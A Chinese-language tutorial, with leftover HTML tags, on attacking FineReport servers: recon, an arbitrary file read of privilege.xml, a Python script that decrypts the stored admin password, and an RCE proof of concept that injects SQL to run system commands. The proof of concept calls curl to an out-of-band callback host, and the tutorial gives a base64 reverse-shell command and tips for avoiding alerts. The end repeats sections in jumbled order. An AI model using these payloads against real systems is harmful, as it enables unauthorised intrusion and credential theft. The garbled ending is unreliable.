帆软报表(FineReport)漏洞挖掘与利用教学文档<\/h1>

一、资产发现与信息收集<\/h2>

1.1 子域名发现<\/h3>

使用Google搜索语法：<\/p>

site:xxx.com -www
<\/code><\/pre>
通过该语法可以发现目标域名的所有子域名，排除www主站。<\/p>
1.2 真实IP获取<\/h3>
在访问网站时，观察点击"电信"、"网通"、"自动"等选项时的域名跳转行为，可能会暴露真实IP地址。<\/p>
1.3 端口扫描与目录扫描<\/h3>
获取真实IP后，进行：<\/p>

全端口扫描<\/li>
目录扫描

常见发现端口：8080端口可能存在ReportServe部署页面<\/li>
<\/ul>
二、漏洞利用链<\/h2>
2.1 任意文件读取漏洞<\/h3>
漏洞URL<\/strong>：<\/p>
http:\/\/xxx.xxx.xxx.xxx:8080\/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
<\/code><\/pre>
特点<\/strong>：<\/p>

直接访问可能显示空白页，需要查看页面源代码才能获取信息<\/li>
可读取服务器上的敏感文件(如privilege.xml)<\/li>
<\/ul>
2.2 密码解密<\/h3>
从文件中获取的密文格式示例：<\/p>
___0022007c0039003b005100e3
<\/code><\/pre>
解密脚本(Python)<\/strong>：<\/p>
cipher =<\/span> '___0022007c0039003b005100e3'<\/span>  # 密文<\/span>
<\/span><\/span>PASSWORD_MASK_ARRAY =<\/span> [19<\/span>, 78<\/span>, 10<\/span>, 15<\/span>, 100<\/span>, 213<\/span>, 43<\/span>, 23<\/span>]  # 掩码<\/span>
<\/span><\/span>
<\/span><\/span>Password =<\/span> ""<\/span>
<\/span><\/span>cipher =<\/span> cipher[3<\/span>:]  # 截断前三位<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(int(len(cipher)\/<\/span>4<\/span>)):
<\/span><\/span>    c1 =<\/span> int("0x"<\/span> +<\/span> cipher[i*<\/span>4<\/span>:(i+<\/span>1<\/span>)*<\/span>4<\/span>], 16<\/span>)
<\/span><\/span>    c2 =<\/span> c1 ^<\/span> PASSWORD_MASK_ARRAY[i %<\/span> 8<\/span>]
<\/span><\/span>    Password =<\/span> Password +<\/span> chr(c2)
<\/span><\/span>
<\/span><\/span>print(Password)  # 输出解密后的密码<\/span>
<\/span><\/span><\/code><\/pre>解密步骤<\/strong>：<\/p>

去除密文前三个字符<\/li>
每4个字符为一组转换为16进制整数<\/li>
与PASSWORD_MASK_ARRAY进行异或运算<\/li>
将结果转换为ASCII字符<\/li>
<\/ol>
2.3 后台登录<\/h3>
使用解密得到的密码(如"123456")登录数据决策系统后台。<\/p>
三、远程命令执行漏洞<\/h2>
3.1 漏洞信息<\/h3>
影响版本<\/strong>：<\/p>

帆软报表 FineReport v8.0<\/li>
帆软报表 FineReport v9.0<\/li>
<\/ul>
漏洞URL<\/strong>：<\/p>
http:\/\/xxx.xxx.xxx.xxx:8080\/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=posun
<\/code><\/pre>
(需要将username参数改为已知的有效用户名)<\/p>
3.2 漏洞验证(POC)<\/h3>
步骤<\/strong>：<\/p>

访问漏洞URL<\/li>
点击"查询"按钮并拦截请求(Burp Suite)<\/li>
替换POST数据为：<\/li>
<\/ol>
{
<\/span><\/span>    "__parameters__"<\/span>: {
<\/span><\/span>        "LABEL1"<\/span>: "TYPE:"<\/span>,
<\/span><\/span>        "TYPE"<\/span>: "6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http:\/\/uki7s7.ceye.io');select msg, trace, sinfo, logtime from fr_errrecord where 1=1"<\/span>,
<\/span><\/span>        "LABEL3"<\/span>: "START_TIME:"<\/span>,
<\/span><\/span>        "START_TIME"<\/span>: "2020-08-11 00:00"<\/span>,
<\/span><\/span>        "LABEL5"<\/span>: "END_TIME:"<\/span>,
<\/span><\/span>        "END_TIME"<\/span>: "2020-08-11 16:41"<\/span>,
<\/span><\/span>        "LABEL7"<\/span>: "LIMIT:"<\/span>,
<\/span><\/span>        "LIMIT"<\/span>: 2<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

TYPE<\/code>参数中包含恶意SQL语句<\/li>
创建别名RUMCMD<\/code>调用系统命令执行功能<\/li>
使用curl<\/code>测试外连，验证漏洞存在<\/li>
<\/ul>
3.3 反弹Shell<\/h3>
步骤<\/strong>：<\/p>

准备Base64编码的反弹Shell命令：<\/li>
<\/ol>
bash -c {<\/span>echo,base64编码}<\/span>|{<\/span>base64,-d}<\/span>|{<\/span>bash,-i}<\/span>
<\/span><\/span><\/code><\/pre>
在VPS上监听指定端口(如7777)<\/li>
将上述命令替换到POC的TYPE<\/code>参数中执行<\/li>
<\/ol>
注意事项<\/strong>：<\/p>

查询操作不能太频繁，容易触发并发数限制<\/li>
需要等待一段时间(可能一天)并发数才会重置<\/li>
目标系统可能有防护机制，需谨慎操作<\/li>
<\/ul>
四、漏洞组合利用思路<\/h2>

通过信息收集发现目标系统<\/li>
利用任意文件读取获取凭证<\/li>
解密凭证后尝试登录后台<\/li>
若后台功能受限，转向未授权RCE漏洞<\/li>
组合利用多个漏洞提升危害等级<\/li>
<\/ol>
五、防御建议<\/h2>

及时升级帆软报表到最新版本<\/li>
限制敏感文件(如privilege.xml)的访问权限<\/li>
加强密码加密机制，避免使用固定掩码<\/li>
对用户输入进行严格过滤，防止SQL注入<\/li>
限制系统命令执行功能<\/li>
设置合理的并发请求限制<\/li>
<\/ol>
六、总结<\/h2>
本教学文档详细介绍了帆软报表(FineReport)系统的漏洞挖掘与利用方法，包括信息收集、任意文件读取、密码解密、远程命令执行等关键技术点。通过组合利用多个漏洞，可以实现从信息泄露到系统完全控制的全过程。在实际渗透测试中，需要注意操作频率和系统防护机制，避免触发安全警报。<\/p>

帆软报表(FineReport)漏洞挖掘与利用教学文档<\/h1>

一、资产发现与信息收集<\/h2>

1.2 真实IP获取<\/h3> 在访问网站时，观察点击"电信"、"网通"、"自动"等选项时的域名跳转行为，可能会暴露真实IP地址。<\/p>

二、漏洞利用链<\/h2>

2.3 后台登录<\/h3> 使用解密得到的密码(如"123456")登录数据决策系统后台。<\/p>

三、远程命令执行漏洞<\/h2>

1.2 真实IP获取<\/h3>
在访问网站时，观察点击"电信"、"网通"、"自动"等选项时的域名跳转行为，可能会暴露真实IP地址。<\/p>

2.3 后台登录<\/h3>
使用解密得到的密码(如"123456")登录数据决策系统后台。<\/p>